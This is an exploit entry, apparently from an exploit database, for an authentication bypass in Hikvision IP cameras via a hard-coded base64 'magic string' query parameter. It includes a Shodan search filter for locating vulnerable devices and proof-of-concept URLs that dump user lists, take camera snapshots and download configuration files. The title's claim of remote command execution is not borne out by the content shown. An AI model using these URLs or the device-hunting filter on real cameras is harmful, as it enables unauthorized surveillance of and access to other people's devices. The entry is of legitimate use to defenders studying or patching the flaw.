# Exploit Title: Hikvision Camera - Remote command execution (authentication bypass via hard-coded auth string)
# Date: 4/22/2024
# Google Dork: none. Shodan filter for affected web interfaces: "Web Version="3.1.3.150324" http.favicon.hash:999357577"
# Exploit Author: parsa rezaie khiabanloo
# Tested on: Windows/Linux
# 1. Description:
Hikvision firmware included a hard-coded "magic string" that grants instant access to an affected camera regardless of the configured admin password. All that is needed is to append the string as a query parameter to Hikvision web/ISAPI requests: ?auth=YWRtaW46MTEK (base64 of the credential pair "admin:11" followed by a newline). No valid account on the camera is required.
# The issue affects Hikvision IP cameras running the web interface version matched by the Shodan filter above.
# 2. Proof of Concept:
Retrieve a list of all users and their roles:
- http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
- http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
Download camera configuration:
- http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK